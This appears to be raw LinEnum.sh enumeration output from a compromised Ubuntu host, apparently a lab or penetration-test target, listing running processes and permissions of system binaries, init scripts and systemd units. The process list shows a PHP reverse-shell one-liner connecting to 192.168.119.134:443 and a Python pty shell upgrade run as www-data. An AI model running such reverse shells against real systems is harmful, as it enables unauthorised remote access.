postfix  23177  0.0  0.5  73808  5312 ?        S    10:11   0:00 pickup -l -t unix -u -c
root     23185  0.0  0.0      0     0 ?        I    10:28   0:00 [kworker/u2:0]
root     23196  0.0  0.0      0     0 ?        I    10:33   0:00 [kworker/u2:2]
www-data 23217  0.0  0.0   4628   856 ?        S    10:38   0:00 sh -c php -r '$sock=fsockopen("192.168.119.134",443);shell_exec("/bin/sh -i <&3 >&3 2>&3");' 2>&1
www-data 23218  0.0  1.4 135140 14796 ?        S    10:38   0:00 php -r $sock=fsockopen("192.168.119.134",443);shell_exec("/bin/sh -i <&3 >&3 2>&3");
www-data 23219  0.0  0.0   4628   776 ?        S    10:38   0:00 sh -c /bin/sh -i <&3 >&3 2>&3
www-data 23220  0.0  0.0   4628   884 ?        S    10:38   0:00 /bin/sh -i
www-data 23299  0.0  0.9  37340  9244 ?        S    10:40   0:00 python3 -c import pty;pty.spawn('/bin/bash')
www-data 23300  0.0  0.3  18616  3524 pts/1    Ss   10:40   0:00 /bin/bash
www-data 23333  0.5  0.4  19300  4112 pts/1    S+   10:45   0:00 /bin/bash ./LinEnum.sh
www-data 23334  0.1  0.3  19300  3160 pts/1    S+   10:45   0:00 /bin/bash ./LinEnum.sh
www-data 23335  0.0  0.0   4536   804 pts/1    S+   10:45   0:00 tee -a
postfix  23419  0.0  0.5  73916  5280 ?        S    10:45   0:00 cleanup -z -t unix -u -c
postfix  23420  0.0  0.5  73820  5164 ?        S    10:45   0:00 trivial-rewrite -n rewrite -t unix -u -c
postfix  23421  0.0  0.6  69472  6408 ?        S    10:45   0:00 local -t unix
www-data 23539  0.0  0.2  19300  2968 pts/1    S+   10:45   0:00 /bin/bash ./LinEnum.sh
www-data 23540  0.0  0.3  36700  3140 pts/1    R+   10:45   0:00 ps aux
root     26443  0.0  0.2  60084  2076 pts/0    S    Apr06   0:00 su kibosh
kibosh   26444  0.0  0.2  76608  2512 ?        Ss   Apr06   0:00 /lib/systemd/systemd --user
kibosh   26452  0.0  0.0 193564     4 ?        S    Apr06   0:00 (sd-pam)
kibosh   26467  0.0  0.1  21472  1708 pts/0    S    Apr06   0:00 bash
root     26469  0.0  0.2  63516  2236 pts/0    S    Apr06   0:00 sudo su
root     26471  0.0  0.2  63048  2196 pts/0    S    Apr06   0:00 su
root     26472  0.0  0.1  21472  1872 pts/0    S+   Apr06   0:00 bash


[00;31m[-] Process binaries and associated permissions (from above list):[00m
-rwxr-xr-x 1 root root  1113504 Apr  4  2018 /bin/bash
lrwxrwxrwx 1 root root        4 Jan  3  2020 /bin/sh -> dash
-rwxr-xr-x 1 root root  1595792 Apr 20  2018 /lib/systemd/systemd
-rwxr-xr-x 1 root root   129096 Apr 20  2018 /lib/systemd/systemd-journald
-rwxr-xr-x 1 root root   219272 Apr 20  2018 /lib/systemd/systemd-logind
-rwxr-xr-x 1 root root  1616976 Apr 20  2018 /lib/systemd/systemd-networkd
-rwxr-xr-x 1 root root   378944 Apr 20  2018 /lib/systemd/systemd-resolved
-rwxr-xr-x 1 root root    38976 Apr 20  2018 /lib/systemd/systemd-timesyncd
-rwxr-xr-x 1 root root   584136 Apr 20  2018 /lib/systemd/systemd-udevd
-rwxr-xr-x 1 root root    56552 Mar 15  2018 /sbin/agetty
lrwxrwxrwx 1 root root       20 Jan  3  2020 /sbin/init -> /lib/systemd/systemd
-rwxr-xr-x 1 root root   407704 Feb 21  2018 /sbin/iscsid
-rwxr-xr-x 1 root root    84104 Apr 12  2018 /sbin/lvmetad
-rwxr-xr-x 1 root root   125144 Apr 19  2018 /usr/bin/VGAuthService
-rwxr-xr-x 1 root root   236584 Nov 15  2017 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root    18504 Mar 26  2018 /usr/bin/lxcfs
lrwxrwxrwx 1 root root        9 Jan  3  2020 /usr/bin/python3 -> python3.6
-rwxr-xr-x 1 root root    47360 Apr 19  2018 /usr/bin/vmtoolsd
-rwxr-xr-x 1 root root   182552 Dec 17  2017 /usr/lib/accountsservice/accounts-daemon
-rwxr-xr-x 1 root root    14552 Mar 27  2018 /usr/lib/policykit-1/polkitd
-rwxr-xr-x 1 root root    39000 Oct 11  2018 /usr/lib/postfix/sbin/master
-rwxr-xr-x 1 root root 15854280 Apr 16  2018 /usr/lib/snapd/snapd
-rwxr-xr-x 1 root root    52064 Apr 28  2017 /usr/sbin/acpid
-rwxr-xr-x 1 root root   671392 Sep 16  2019 /usr/sbin/apache2
-rwxr-xr-x 1 root root    26632 Feb 20  2018 /usr/sbin/atd
-rwxr-xr-x 1 root root    47416 Nov 16  2017 /usr/sbin/cron
-rwxr-xr-x 1 root root 24605800 Nov 15  2019 /usr/sbin/mysqld
-rwxr-xr-x 1 root root   680488 Apr 24  2018 /usr/sbin/rsyslogd
-rwxr-xr-x 1 root root   786856 Mar  4  2019 /usr/sbin/sshd
-rwxr-xr-x 1 root root    34976 Mar 15  2018 /usr/sbin/uuidd


[00;31m[-] /etc/init.d/ binary permissions:[00m
total 204
drwxr-xr-x  2 root root 4096 Jan  7  2020 .
drwxr-xr-x 98 root root 4096 Jan  8  2020 ..
-rwxr-xr-x  1 root root 2269 Apr 22  2017 acpid
-rwxr-xr-x  1 root root 2489 Jul 16  2019 apache-htcacheclean
-rwxr-xr-x  1 root root 8181 Jul 16  2019 apache2
-rwxr-xr-x  1 root root 4335 Mar 22  2018 apparmor
-rwxr-xr-x  1 root root 2802 Nov 20  2017 apport
-rwxr-xr-x  1 root root 1071 Aug 21  2015 atd
-rwxr-xr-x  1 root root 1232 Apr 19  2018 console-setup.sh
-rwxr-xr-x  1 root root 3049 Nov 16  2017 cron
-rwxr-xr-x  1 root root  937 Mar 17  2018 cryptdisks
-rwxr-xr-x  1 root root  978 Mar 17  2018 cryptdisks-early
-rwxr-xr-x  1 root root 2813 Nov 15  2017 dbus
-rwxr-xr-x  1 root root 4352 Mar 15  2013 ebtables
-rwxr-xr-x  1 root root  985 Mar 18  2019 grub-common
-rwxr-xr-x  1 root root 3809 Feb 14  2018 hwclock.sh
-rwxr-xr-x  1 root root 2444 Oct 25  2017 irqbalance
-rwxr-xr-x  1 root root 1503 Feb 21  2018 iscsid
-rwxr-xr-x  1 root root 1479 Feb 15  2018 keyboard-setup.sh
-rwxr-xr-x  1 root root 2044 Aug 15  2017 kmod
-rwxr-xr-x  1 root root  695 Dec  3  2017 lvm2
-rwxr-xr-x  1 root root  571 Dec  3  2017 lvm2-lvmetad
-rwxr-xr-x  1 root root  586 Dec  3  2017 lvm2-lvmpolld
-rwxr-xr-x  1 root root 2378 Mar 26  2018 lxcfs
-rwxr-xr-x  1 root root 2240 Apr 17  2018 lxd
-rwxr-xr-x  1 root root 2653 Mar  7  2018 mdadm
-rwxr-xr-x  1 root root 1249 Mar  7  2018 mdadm-waitidle
-rwxr-xr-x  1 root root 5607 Jan 12  2018 mysql
-rwxr-xr-x  1 root root 1364 Mar 17  2017 netfilter-persistent
-rwxr-xr-x  1 root root 2503 Feb 21  2018 open-iscsi
-rwxr-xr-x  1 root root 1846 Mar 22  2018 open-vm-tools
-rwxr-xr-x  1 root root 1366 Jan 17  2018 plymouth
-rwxr-xr-x  1 root root  752 Jan 17  2018 plymouth-log
-rwxr-xr-x  1 root root 3624 Oct 11  2018 postfix
-rwxr-xr-x  1 root root 1191 Jan 17  2018 procps
-rwxr-xr-x  1 root root 4485 Sep 28  2016 psad
-rwxr-xr-x  1 root root 4355 Dec 13  2017 rsync
-rwxr-xr-x  1 root root 2864 Jan 14  2018 rsyslog
-rwxr-xr-x  1 root root 1222 May 21  2017 screen-cleanup
-rwxr-xr-x  1 root root 3837 Jan 25  2018 ssh
-rwxr-xr-x  1 root root 5974 Apr 20  2018 udev
-rwxr-xr-x  1 root root 2083 Aug 15  2017 ufw
-rwxr-xr-x  1 root root 1391 Apr 17  2018 unattended-upgrades
-rwxr-xr-x  1 root root 1306 Mar 15  2018 uuidd


[00;31m[-] /etc/init/ config file permissions:[00m
total 12
drwxr-xr-x  2 root root 4096 Jan  3  2020 .
drwxr-xr-x 98 root root 4096 Jan  8  2020 ..
-rw-r--r--  1 root root 1757 Jan 12  2018 mysql.conf


[00;31m[-] /lib/systemd/* config file permissions:[00m
/lib/systemd/:
total 7.3M
drwxr-xr-x 23 root root  20K Jan  7  2020 system
drwxr-xr-x  2 root root 4.0K Jan  3  2020 system-generators
drwxr-xr-x  2 root root 4.0K Jan  3  2020 system-sleep
drwxr-xr-x  2 root root 4.0K Jan  3  2020 system-shutdown
drwxr-xr-x  2 root root 4.0K Jan  3  2020 system-preset
drwxr-xr-x  2 root root 4.0K Jan  3  2020 network
-rw-r--r--  1 root root 2.3M Apr 20  2018 libsystemd-shared-237.so
-rwxr-xr-x  1 root root 1.3K Apr 20  2018 set-cpufreq
-rwxr-xr-x  1 root root 1.6M Apr 20  2018 systemd
-rwxr-xr-x  1 root root 6.0K Apr 20  2018 systemd-ac-power
-rwxr-xr-x  1 root root  18K Apr 20  2018 systemd-backlight
-rwxr-xr-x  1 root root  11K Apr 20  2018 systemd-binfmt
-rwxr-xr-x  1 root root  10K Apr 20  2018 systemd-cgroups-agent
-rwxr-xr-x  1 root root  22K Apr 20  2018 systemd-cryptsetup
-rwxr-xr-x  1 root root  15K Apr 20  2018 systemd-dissect
-rwxr-xr-x  1 root root  18K Apr 20  2018 systemd-fsck
-rwxr-xr-x  1 root root  23K Apr 20  2018 systemd-fsckd
-rwxr-xr-x  1 root root  19K Apr 20  2018 systemd-growfs
-rwxr-xr-x  1 root root  10K Apr 20  2018 systemd-hibernate-resume
-rwxr-xr-x  1 root root  23K Apr 20  2018 systemd-hostnamed
-rwxr-xr-x  1 root root  15K Apr 20  2018 systemd-initctl
-rwxr-xr-x  1 root root 127K Apr 20  2018 systemd-journald
-rwxr-xr-x  1 root root  35K Apr 20  2018 systemd-localed
-rwxr-xr-x  1 root root 215K Apr 20  2018 systemd-logind
-rwxr-xr-x  1 root root  10K Apr 20  2018 systemd-makefs
-rwxr-xr-x  1 root root  15K Apr 20  2018 systemd-modules-load
-rwxr-xr-x  1 root root 1.6M Apr 20  2018 systemd-networkd
-rwxr-xr-x  1 root root  19K Apr 20  2018 systemd-networkd-wait-online
-rwxr-xr-x  1 root root  11K Apr 20  2018 systemd-quotacheck
-rwxr-xr-x  1 root root  10K Apr 20  2018 systemd-random-seed
-rwxr-xr-x  1 root root  15K Apr 20  2018 systemd-remount-fs
-rwxr-xr-x  1 root root  10K Apr 20  2018 systemd-reply-password
-rwxr-xr-x  1 root root 371K Apr 20  2018 systemd-resolved
-rwxr-xr-x  1 root root  19K Apr 20  2018 systemd-rfkill
-rwxr-xr-x  1 root root  43K Apr 20  2018 systemd-shutdown
-rwxr-xr-x  1 root root  15K Apr 20  2018 systemd-sleep
-rwxr-xr-x  1 root root  23K Apr 20  2018 systemd-socket-proxyd
-rwxr-xr-x  1 root root  11K Apr 20  2018 systemd-sulogin-shell
-rwxr-xr-x  1 root root  15K Apr 20  2018 systemd-sysctl
-rwxr-xr-x  1 root root 1.3K Apr 20  2018 systemd-sysv-install
-rwxr-xr-x  1 root root  27K Apr 20  2018 systemd-timedated
-rwxr-xr-x  1 root root  39K Apr 20  2018 systemd-timesyncd
-rwxr-xr-x  1 root root 571K Apr 20  2018 systemd-udevd
-rwxr-xr-x  1 root root  15K Apr 20  2018 systemd-update-utmp
-rwxr-xr-x  1 root root  10K Apr 20  2018 systemd-user-sessions
-rwxr-xr-x  1 root root  10K Apr 20  2018 systemd-veritysetup
-rwxr-xr-x  1 root root  10K Apr 20  2018 systemd-volatile-root
-rw-r--r--  1 root root  685 Jan 28  2018 resolv.conf

/lib/systemd/system:
total 1004K
drwxr-xr-x 2 root root 4.0K Jan  3  2020 apache2.service.d
lrwxrwxrwx 1 root root    9 Jan  3  2020 screen-cleanup.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Jan  3  2020 halt.target.wants
drwxr-xr-x 2 root root 4.0K Jan  3  2020 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Jan  3  2020 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Jan  3  2020 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Jan  3  2020 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Jan  3  2020 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Jan  3  2020 sysinit.target.wants
lrwxrwxrwx 1 root root    9 Jan  3  2020 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 checkroot.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 fuse.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Jan  3  2020 getty.target.wants
drwxr-xr-x 2 root root 4.0K Jan  3  2020 graphical.target.wants
lrwxrwxrwx 1 root root    9 Jan  3  2020 halt.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 hostname.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 hwclock.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 killprocs.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Jan  3  2020 local-fs.target.wants
lrwxrwxrwx 1 root root    9 Jan  3  2020 motd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 mountall.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 rc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 rcS.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 reboot.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Jan  3  2020 rescue.target.wants
lrwxrwxrwx 1 root root    9 Jan  3  2020 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 sendsigs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 single.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Jan  3  2020 sockets.target.wants
lrwxrwxrwx 1 root root    9 Jan  3  2020 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 stop-bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 sudo.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Jan  3  2020 timers.target.wants
lrwxrwxrwx 1 root root    9 Jan  3  2020 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jan  3  2020 x11-common.service -> /dev/null
lrwxrwxrwx 1 root root   21 Jan  3  2020 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root   27 Jan  3  2020 urandom.service -> systemd-random-seed.service
drwxr-xr-x 2 root root 4.0K Jan  3  2020 user@.service.d
lrwxrwxrwx 1 root root   28 Jan  3  2020 kmod.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root   28 Jan  3  2020 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root   22 Jan  3  2020 procps.service -> systemd-sysctl.service
drwxr-xr-x 2 root root 4.0K Jan  3  2020 rc-local.service.d
lrwxrwxrwx 1 root root   16 Jan  3  2020 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root   15 Jan  3  2020 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Jan  3  2020 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 Jan  3  2020 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Jan  3  2020 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Jan  3  2020 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root   16 Jan  3  2020 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 Jan  3  2020 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root   14 Jan  3  2020 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root   13 Jan  3  2020 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root   25 Jan  3  2020 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root   23 Jan  3  2020 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root   22 Jan  3  2020 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root   25 Jan  3  2020 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
lrwxrwxrwx 1 root root   16 Jan  3  2020 default.target -> graphical.target
-rw-r--r-- 1 root root  155 Dec 18  2019 phpsessionclean.service
-rw-r--r-- 1 root root  144 Dec 18  2019 phpsessionclean.timer
-rw-r--r-- 1 root root  528 Jul 16  2019 apache-htcacheclean.service
-rw-r--r-- 1 root root  537 Jul 16  2019 apache-htcacheclean@.service
-rw-r--r-- 1 root root  346 Jul 16  2019 apache2.service
-rw-r--r-- 1 root root  418 Jul 16  2019 apache2@.service
-rw-r--r-- 1 root root  456 Mar 21  2019 netfilter-persistent.service
-rw-r--r-- 1 root root  253 Oct 11  2018 postfix.service
-rw-r--r-- 1 root root  516 Oct 11  2018 postfix@.service
-rw-r--r-- 1 root root  290 Apr 24  2018 rsyslog.service
-rw-r--r-- 1 root root  266 Apr 23  2018 netplan-wpa@.service
-rw-r--r-- 1 root root 1.1K Apr 20  2018 console-getty.service
-rw-r--r-- 1 root root 1.3K Apr 20  2018 container-getty@.service
-rw-r--r-- 1 root root 1.1K Apr 20  2018 debug-shell.service
-rw-r--r-- 1 root root  797 Apr 20  2018 emergency.service
-rw-r--r-- 1 root root  342 Apr 20  2018 getty-static.service
-rw-r--r-- 1 root root 2.0K Apr 20  2018 getty@.service
-rw-r--r-- 1 root root  670 Apr 20  2018 initrd-cleanup.service
-rw-r--r-- 1 root root  830 Apr 20  2018 initrd-parse-etc.service
-rw-r--r-- 1 root root  589 Apr 20  2018 initrd-switch-root.service
-rw-r--r-- 1 root root  704 Apr 20  2018 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root  717 Apr 20  2018 kmod-static-nodes.service
-rw-r--r-- 1 root root  362 Apr 20  2018 ondemand.service
-rw-r--r-- 1 root root  609 Apr 20  2018 quotaon.service
-rw-r--r-- 1 root root  716 Apr 20  2018 rc-local.service
-rw-r--r-- 1 root root  788 Apr 20  2018 rescue.service
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel5.target.wants
-rw-r--r-- 1 root root 1.5K Apr 20  2018 serial-getty@.service
-rw-r--r-- 1 root root  554 Apr 20  2018 suspend-then-hibernate.target
-rw-r--r-- 1 root root 1.4K Apr 20  2018 system-update-cleanup.service
-rw-r--r-- 1 root root  724 Apr 20  2018 systemd-ask-password-console.service
-rw-r--r-- 1 root root  752 Apr 20  2018 systemd-ask-password-wall.service
-rw-r--r-- 1 root root  752 Apr 20  2018 systemd-backlight@.service
-rw-r--r-- 1 root root  999 Apr 20  2018 systemd-binfmt.service
-rw-r--r-- 1 root root  537 Apr 20  2018 systemd-exit.service
-rw-r--r-- 1 root root  714 Apr 20  2018 systemd-fsck-root.service
-rw-r--r-- 1 root root  715 Apr 20  2018 systemd-fsck@.service
-rw-r--r-- 1 root root  551 Apr 20  2018 systemd-fsckd.service
-rw-r--r-- 1 root root  540 Apr 20  2018 systemd-fsckd.socket
-rw-r--r-- 1 root root  584 Apr 20  2018 systemd-halt.service
-rw-r--r-- 1 root root  671 Apr 20  2018 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root  541 Apr 20  2018 systemd-hibernate.service
-rw-r--r-- 1 root root 1.1K Apr 20  2018 systemd-hostnamed.service
-rw-r--r-- 1 root root  818 Apr 20  2018 systemd-hwdb-update.service
-rw-r--r-- 1 root root  559 Apr 20  2018 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root  551 Apr 20  2018 systemd-initctl.service
-rw-r--r-- 1 root root  771 Apr 20  2018 systemd-journal-flush.service
-rw-r--r-- 1 root root  686 Apr 20  2018 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.6K Apr 20  2018 systemd-journald.service
-rw-r--r-- 1 root root  597 Apr 20  2018 systemd-kexec.service
-rw-r--r-- 1 root root 1.1K Apr 20  2018 systemd-localed.service
-rw-r--r-- 1 root root 1.5K Apr 20  2018 systemd-logind.service
-rw-r--r-- 1 root root  733 Apr 20  2018 systemd-machine-id-commit.service
-rw-r--r-- 1 root root 1007 Apr 20  2018 systemd-modules-load.service
-rw-r--r-- 1 root root  740 Apr 20  2018 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root 1.9K Apr 20  2018 systemd-networkd.service
-rw-r--r-- 1 root root  593 Apr 20  2018 systemd-poweroff.service
-rw-r--r-- 1 root root  655 Apr 20  2018 systemd-quotacheck.service
-rw-r--r-- 1 root root  792 Apr 20  2018 systemd-random-seed.service
-rw-r--r-- 1 root root  588 Apr 20  2018 systemd-reboot.service
-rw-r--r-- 1 root root  833 Apr 20  2018 systemd-remount-fs.service
-rw-r--r-- 1 root root 1.7K Apr 20  2018 systemd-resolved.service
-rw-r--r-- 1 root root  724 Apr 20  2018 systemd-rfkill.service
-rw-r--r-- 1 root root  573 Apr 20  2018 systemd-suspend-then-hibernate.service
-rw-r--r-- 1 root root  537 Apr 20  2018 systemd-suspend.service
-rw-r--r-- 1 root root  693 Apr 20  2018 systemd-sysctl.service
-rw-r--r-- 1 root root 1.1K Apr 20  2018 systemd-timedated.service
-rw-r--r-- 1 root root 1.4K Apr 20  2018 systemd-timesyncd.service
-rw-r--r-- 1 root root  659 Apr 20  2018 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  764 Apr 20  2018 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root  744 Apr 20  2018 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root  863 Apr 20  2018 systemd-udev-settle.service
-rw-r--r-- 1 root root  755 Apr 20  2018 systemd-udev-trigger.service
-rw-r--r-- 1 root root  985 Apr 20  2018 systemd-udevd.service
-rw-r--r-- 1 root root  797 Apr 20  2018 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root  794 Apr 20  2018 systemd-update-utmp.service
-rw-r--r-- 1 root root  628 Apr 20  2018 systemd-user-sessions.service
-rw-r--r-- 1 root root  690 Apr 20  2018 systemd-volatile-root.service
-rw-r--r-- 1 root root  593 Apr 20  2018 user@.service
-rw-r--r-- 1 root root  238 Apr 20  2018 apt-daily-upgrade.service
-rw-r--r-- 1 root root  184 Apr 20  2018 apt-daily-upgrade.timer
-rw-r--r-- 1 root root  326 Apr 20  2018 apt-daily.service
-rw-r--r-- 1 root root  156 Apr 20  2018 apt-daily.timer
-rw-r--r-- 1 root root  306 Apr 19  2018 open-vm-tools.service
-rw-r--r-- 1 root root  258 Apr 19  2018 networkd-dispatcher.service
-rw-r--r-- 1 root root  320 Apr 17  2018 lxd-containers.service
-rw-r--r-- 1 root root  605 Apr 17  2018 lxd.service
-rw-r--r-- 1 root root  197 Apr 17  2018 lxd.socket
-rw-r--r-- 1 root root  368 Apr 17  2018 unattended-upgrades.service
-rw-r--r-- 1 root root  252 Apr 16  2018 snapd.autoimport.service
-rw-r--r-- 1 root root  386 Apr 16  2018 snapd.core-fixup.service
-rw-r--r-- 1 root root  308 Apr 16  2018 snapd.service
-rw-r--r-- 1 root root  287 Apr 16  2018 snapd.snap-repair.service
-rw-r--r-- 1 root root  281 Apr 16  2018 snapd.snap-repair.timer
-rw-r--r-- 1 root root  281 Apr 16  2018 snapd.socket
-rw-r--r-- 1 root root  474 Apr 16  2018 snapd.system-shutdown.service
-rw-r--r-- 1 root root  412 Apr 12  2018 plymouth-halt.service
-rw-r--r-- 1 root root  426 Apr 12  2018 plymouth-kexec.service
lrwxrwxrwx 1 root root   27 Apr 12  2018 plymouth-log.service -> plymouth-read-write.service
-rw-r--r-- 1 root root  421 Apr 12  2018 plymouth-poweroff.service
-rw-r--r-- 1 root root  200 Apr 12  2018 plymouth-quit-wait.service
-rw-r--r-- 1 root root  194 Apr 12  2018 plymouth-quit.service
-rw-r--r-- 1 root root  244 Apr 12  2018 plymouth-read-write.service
-rw-r--r-- 1 root root  416 Apr 12  2018 plymouth-reboot.service
-rw-r--r-- 1 root root  532 Apr 12  2018 plymouth-start.service
-rw-r--r-- 1 root root  291 Apr 12  2018 plymouth-switch-root.service
lrwxrwxrwx 1 root root   21 Apr 12  2018 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root  490 Apr 12  2018 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root  467 Apr 12  2018 systemd-ask-password-plymouth.service
-rw-r--r-- 1 root root  383 Apr 12  2018 blk-availability.service
-rw-r--r-- 1 root root  341 Apr 12  2018 dm-event.service
-rw-r--r-- 1 root root  248 Apr 12  2018 dm-event.socket
-rw-r--r-- 1 root root  345 Apr 12  2018 lvm2-lvmetad.service
-rw-r--r-- 1 root root  215 Apr 12  2018 lvm2-lvmetad.socket
-rw-r--r-- 1 root root  300 Apr 12  2018 lvm2-lvmpolld.service
-rw-r--r-- 1 root root  213 Apr 12  2018 lvm2-lvmpolld.socket
-rw-r--r-- 1 root root  693 Apr 12  2018 lvm2-monitor.service
-rw-r--r-- 1 root root  403 Apr 12  2018 lvm2-pvscan@.service
lrwxrwxrwx 1 root root    9 Apr 12  2018 lvm2.service -> /dev/null
-rw-r--r-- 1 root root  173 Apr  9  2018 motd-news.service
-rw-r--r-- 1 root root  175 Apr  9  2018 motd-news.timer
-rw-r--r-- 1 root root  808 Mar 29  2018 friendly-recovery.service
-rw-r--r-- 1 root root  175 Mar 27  2018 polkit.service
-rw-r--r-- 1 root root  311 Mar 26  2018 lxcfs.service
-rw-r--r-- 1 root root  544 Mar 22  2018 apparmor.service
-rw-r--r-- 1 root root  298 Mar 22  2018 vgauth.service
-rw-r--r-- 1 root root   92 Mar 15  2018 fstrim.service
-rw-r--r-- 1 root root  170 Mar 15  2018 fstrim.timer
-rw-r--r-- 1 root root  189 Mar 15  2018 uuidd.service
-rw-r--r-- 1 root root  126 Mar 15  2018 uuidd.socket
-rw-r--r-- 1 root root  481 Mar  7  2018 mdadm-grow-continue@.service
-rw-r--r-- 1 root root  207 Mar  7  2018 mdadm-last-resort@.service
-rw-r--r-- 1 root root  176 Mar  7  2018 mdadm-last-resort@.timer
-rw-r--r-- 1 root root  670 Mar  7  2018 mdadm-shutdown.service
lrwxrwxrwx 1 root root    9 Mar  7  2018 mdadm-waitidle.service -> /dev/null
lrwxrwxrwx 1 root root    9 Mar  7  2018 mdadm.service -> /dev/null
-rw-r--r-- 1 root root 1.1K Mar  7  2018 mdmon@.service
-rw-r--r-- 1 root root  388 Mar  7  2018 mdmonitor.service
-rw-r--r-- 1 root root  494 Feb 21  2018 iscsid.service
-rw-r--r-- 1 root root 1.3K Feb 21  2018 open-iscsi.service
-rw-r--r-- 1 root root  169 Feb 20  2018 atd.service
-rw-r--r-- 1 root root  287 Feb 15  2018 keyboard-setup.service
-rw-r--r-- 1 root root  312 Feb 15  2018 console-setup.service
-rw-r--r-- 1 root root  919 Jan 28  2018 basic.target
-rw-r--r-- 1 root root  419 Jan 28  2018 bluetooth.target
-rw-r--r-- 1 root root  465 Jan 28  2018 cryptsetup-pre.target
-rw-r--r-- 1 root root  412 Jan 28  2018 cryptsetup.target
-rw-r--r-- 1 root root  750 Jan 28  2018 dev-hugepages.mount
-rw-r--r-- 1 root root  665 Jan 28  2018 dev-mqueue.mount
-rw-r--r-- 1 root root  471 Jan 28  2018 emergency.target
-rw-r--r-- 1 root root  541 Jan 28  2018 exit.target
-rw-r--r-- 1 root root  480 Jan 28  2018 final.target
-rw-r--r-- 1 root root  506 Jan 28  2018 getty-pre.target
-rw-r--r-- 1 root root  500 Jan 28  2018 getty.target
-rw-r--r-- 1 root root  598 Jan 28  2018 graphical.target
-rw-r--r-- 1 root root  527 Jan 28  2018 halt.target
-rw-r--r-- 1 root root  509 Jan 28  2018 hibernate.target
-rw-r--r-- 1 root root  530 Jan 28  2018 hybrid-sleep.target
-rw-r--r-- 1 root root  593 Jan 28  2018 initrd-fs.target
-rw-r--r-- 1 root root  561 Jan 28  2018 initrd-root-device.target
-rw-r--r-- 1 root root  566 Jan 28  2018 initrd-root-fs.target
-rw-r--r-- 1 root root  754 Jan 28  2018 initrd-switch-root.target
-rw-r--r-- 1 root root  763 Jan 28  2018 initrd.target
